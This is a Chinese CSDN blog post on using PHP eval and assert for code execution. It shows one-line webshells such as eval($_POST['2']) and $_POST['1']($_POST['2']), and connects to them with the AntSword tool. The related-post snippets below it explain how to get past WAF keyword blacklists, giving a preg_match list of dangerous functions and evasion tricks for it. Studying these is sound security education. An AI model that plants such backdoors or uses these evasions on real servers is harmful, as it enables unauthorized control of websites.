eval和assert

最新推荐文章于 2023-03-28 03:00:00 发布
最新推荐文章于 2023-03-28 03:00:00 发布
阅读量954 收藏
点赞数
分类专栏: 安全 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45492087/article/details/125981248
版权
本文探讨了PHP中使用POST方法传递数据时,如何滥用`eval`和`assert`等危险函数进行代码执行。示例展示了通过变量函数调用`eval`的规避方法以及使用`assert`执行代码的两种方式,强调了安全编码的重要性。
摘要由CSDN通过智能技术生成

1、使用POST方法传递1

PHP:

#str = 'aaaa';
$str = $_POST['1'];
echo $str;

在这里插入图片描述

2、使用POST方法传递2

PHP:

#eval(phpinfo())
eval($_POST['2'])

在这里插入图片描述
使用中国蚁剑:
在这里插入图片描述

3、eval是一个语言构造器而不是一个函数,不能被可变函数调用

调用方法

function eval_1($str)
{
   eval($str);
}
$a='eval_1';
$a('phpinfo()');

4、使用assert

PHP:

<?php
$_POST['1']($_POST['2']);
?>

方式一:assert()中必须是函数,所以要使用编码器

在这里插入图片描述

方式二:

在2中提交eval,eval可以包含字符串,assert只能包含函数

在这里插入图片描述

胡锦成
关注
专栏目录
evalassert一句话木马分析
weixin_49472648的博客
07-23 2707
利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过蚁剑等webshell工具即可获取和控制整个网站目录。 一般的php一句话后门很容易被网站防火墙waf拦截,而waf通常通过判断关键字来辨别一句话木马,要想绕过waf就需要对木马进行一些变形。............
php5和php7中evalassert
L1ni01
12-04 2215
eval php官方手册: (PHP 4, PHP 5, PHP 7) eval — 把字符串作为PHP代码执行 该函数只有一个参数,即需要被执行的字符串代码。 代码不能包含打开/关闭PHP标签,但可以用合适的 PHP tag 来离开、重新进入 PHP 模式。 我们下面进行测试 <?php eval(' echo "Hi!"; '); echo "\n"; //eval('echo `whoami`;'); eval('<?php echo "Hi!";?>'); echo "\n"; e
evalassert区别
天天学安全专属博客
03-28 788
evalassert区别
assert()和eval()
an4455的博客
05-15 263
assert():  assert这个函数在php语言中是用来判断一个表达式是否成立。返回true or false;例如 <?php $s = 123; assert("is_int($s)"); ?>   从这个例子可以看到字符串参数会被执行,这跟eval()类似。不过eval($code_str)只是执行符合php编码规范的$code_str。asse...
简述 asserteval 的区别
thj_blog
11-09 3382
       首先和大家说明,我所理解的也是在网上查询资料,总结下来的。我尽可能说的通俗易懂一些,看网上的资料,发现很多高大上的东西,我对PHP理解很浅,望大家批评指正。(我所理解的对于初学者够用了)        相同点:二者都可以执行PHP语句。只不过是,eval规范更加严格一些,必须符合PHP代码要求。而assert则没有那么严格,执行PHP表达式即可。并不是对assert无计可施,可以采...
PHP evalassert
qq_40481505的博客
09-17 402
eval():函数把字符串按照 PHP 代码来计算,该字符串必须是合法的 PHP 代码,且必须以分号结尾。 如eval(“echo 1;”) assert():功能是判断一个表达式是否成立,返回true or false,重点是函数会执行此表达式。如果表达式为函数如assert(“echo(1)”),则会输出1,而如果 为assert(“echo 1;”)则不会有输出。 ...
php assert eval,代码执行函数之一句话木马
weixin_28864249的博客
03-23 2079
前言大家好,我是阿里斯,一名IT行业小白。非常抱歉,昨天的内容出现瑕疵比较多,今天重新整理后再次发出,修改并添加了细节,另增加了常见的命令执行函数如果哪里不足,还请各位表哥指出。evalassert的区别eval特点eval()会把字符串按照php代码来执行(合法的php代码,以分号结尾)eval()是一个语言构造器,不能被可变函数调用eval($_REQUEST[1]); #eval一句话...
通过蚁剑,利用evalassert,登录目标网站
weixin_52159400的博客
07-29 382
eval()函数把字符串按照PHP代码来计算。该字符串必须是合法的PHP代码,且必须以分号结尾。如果没有在代码字符串中调用return语句,则返回NULL。如果代码中存在解析错误,则eval()函数返回false。pythoneval()函数的描述与用法eval()函数计算或执行参数。如果参数是表达式,则eval()计算表达式。如果参数是一个或多个JavaScript语句,则eval()执行这些语句。...
php system eval,PHP后门的eval类和system类 函数到底有哪些区别
weixin_31960145的博客
04-12 937
一、一直以来对PHP的eval这一类函数和system这一类存在疑惑的地方,今天彻底研究了一下,写查PHP一句话的时候可以更有把握一些。其实都是一些满基础的知识,大佬别喷。干安全的基础很重要。二、PHP的eval类型函数,一句话:代码执行而不是命令执行。(菜刀用这类)1、简单类//#1-evaleval($_POST["cmd"])?>//post:cmd=phpinfo();//#2-as...
python语法知识点总结以及asserteval的成功与失败
qq_31088019的博客
07-23 722
python语法知识点以及asserteval通过中国蚁剑登录
evalassert执行一句话木马
C_LCH_2000的博客
07-24 2440
eval函数中参数是字符,assert函数中参数为表达式 (或者为函数)
WEB】从底层分析evalassert的区别
HAPPY
08-19 424
https://www.cnblogs.com/iamstudy/articles/analysis_eval_and_assert.html
Python基础知识点梳理
热门推荐
m0_46245938的博客
02-04 4万+
python常见知识点梳理 摘要: 本文主要介绍一些平时经常会用到的python基础知识点,用于加深印象。python的详细语法介绍可以查看官方编程手册,也有一些在线网站对python语法进行了比较全面的介绍,比如菜鸟教程: python3 教程|菜鸟教程 本文主要是介绍基础语法,操作实例在另一篇博客中单独介绍: python语言介绍 python是一门解释型语言,python的设计目标: 一门...
浅谈evalassert一句话木马执行区别
m0_46467017的博客
07-23 1623
一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的木马的函数执行了我们发送的命令。
PHP变量函数(可变函数)
sinat_34463728的博客
04-09 486
PHP 支持可变函数的概念。这意味着如果一个变量名后有圆括号,PHP 将寻找与变量的值同名的函数,并且尝试执行它。可变函数可以用来实现包括回调函数,函数表在内的一些用途。可变函数不能用于例如 echo,print,unset(),isset(),empty(),include,require 以及类似的语言结构。需要使用自己的包装函数来将这些结构用作可变函数。 function fo
一句话后门中evalassert的区别
whatday的专栏
03-01 1万+
eval函数中参数是字符,如: eval('echo 1;'); assert函数中参数为表达式 (或者为函数),如: assert(phpinfo()) assert(eval('echo 1;')); 直接传递普通代码是无法执行的,如:assert('echo 1;'); 下面这个代码执行不了: @array_map("eval",arra
PHP asserteval
Miss Dan的博客
03-14 3203
assert 判断一个表达式是否成立。返回true or false; &lt;?php $s = 123; assert("is_int($s)"); ?&gt; 从这个例子可以看到字符串参数会被执行,这跟eval()类似。 不过eval($code_str)只是执行符合php编码规范的$code_str。 eval():该函数对于在数据库文本字段中供日后计算而进行的代码存储很有用。(在...
assert()函数用法总结
大灰狼的专栏
04-22 2万+
assert宏的原型定义在中,其作用是如果它的条件返回错误,则终止程序执行,原型定义: #include assert.h> void assert( int expression );   assert的作用是现计算表达式 expression ,如果其值为假(即为0),那么它先向stderr打印一条出错信息,然后通过调用 abort 来终止程序运行。 请看下面的程序清单b
python基础知识点与asserteval的成功与失败
senng的博客
07-25 552
python基础知识点与asserteval的成功与失败
if(preg_match(‘/system|eval|assert|call|create|preg|sort|{|}|filter|exec|passthru|proc|open|echo|`| |.|include|require|flag/i’,$str1) 怎么绕过
最新发布
05-13
if(preg_match('/system|eval|assert|call|create|preg|sort|{|}|filter|exec|passthru|proc|open|echo|`|\s|\.\s|include|require|flag/i', $str1))是一段PHP代码,用于检测字符串$str1中是否包含一些关键字,如果包含,则不执行一些敏感的操作。这是一种常见的安全措施,防止恶意代码执行。 如果你想绕过这段代码的检测,可以尝试以下方法: 1. 使用大小写混合、拼音、全角字符等方式来绕过关键字的检测。 2. 将字符串进行Base64编码,在传递到该代码段之前进行解码,绕过关键字的检测。 3. 使用正则表达式技巧,将关键字进行分割或者替换,使其无法被正则表达式匹配到。 4. 对于特定的关键字,可以将其拆分成多个字符,如把'exec'拆分成'e'、'x'、'e'、'c',然后将它们分别插入到其他字符中间,如将'a'替换成'aexece'。 5. 使用其他语言或者工具来执行敏感操作,如使用Python中的os.system()函数执行命令。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

胡锦成

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值